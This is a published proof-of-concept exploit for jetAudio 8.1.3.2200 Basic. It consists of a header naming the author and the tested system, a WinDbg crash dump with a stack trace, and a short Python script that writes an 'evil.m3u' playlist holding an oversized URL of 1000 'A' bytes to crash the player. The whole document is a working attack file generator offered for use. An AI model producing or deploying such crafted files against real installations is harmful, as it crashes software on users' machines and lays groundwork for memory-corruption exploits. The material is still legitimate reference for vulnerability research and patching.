|
# Exploit Title : jetAudio 8.1.3.2200 Basic (m3u) Crash POC
# Product : jetAudio Basic
# Date : 27.12.2014
# Exploit Author : Hadji Samir s-dz@hotmail.fr
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3.2200 Basic
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : Windows 7 x86 fr
#============================================================================================
# Open created POC file (evil.m3u) with jetAudio
# Details
# ((2bb0.2a60): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=0012fb0c edx=76ed64f4 esi=fffffffe edi=00000000
# eip=76f2e60e esp=0012fb28 ebp=0012fb54 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# ntdll!LdrVerifyImageMatchesChecksum+0x633:
# 76f2e60e cc int 3
#
# 0:000> kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0012fb54 76f0e2d1 7ffdf000 7ffd5000 76f6714c ntdll!LdrVerifyImageMatchesChecksum+0x633
# 0012fcb0 76ef8fc0 0012fd24 76e90000 7346e5a2 ntdll!RtlTimeToElapsedTimeFields+0x4e3d
# 0012fd00 76eeb2c5 0012fd24 76e90000 00000000 ntdll!vsnwprintf+0x3eb
# 0012fd10 00000000 0012fd24 76e90000 00000000 ntdll!LdrInitializeThunk+0x10
#============================================================================================
#!/usr/bin/python
from struct import pack
m3u = ("http://%s")
buf = "\x41" * 1000
m3u %= buf
fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()
|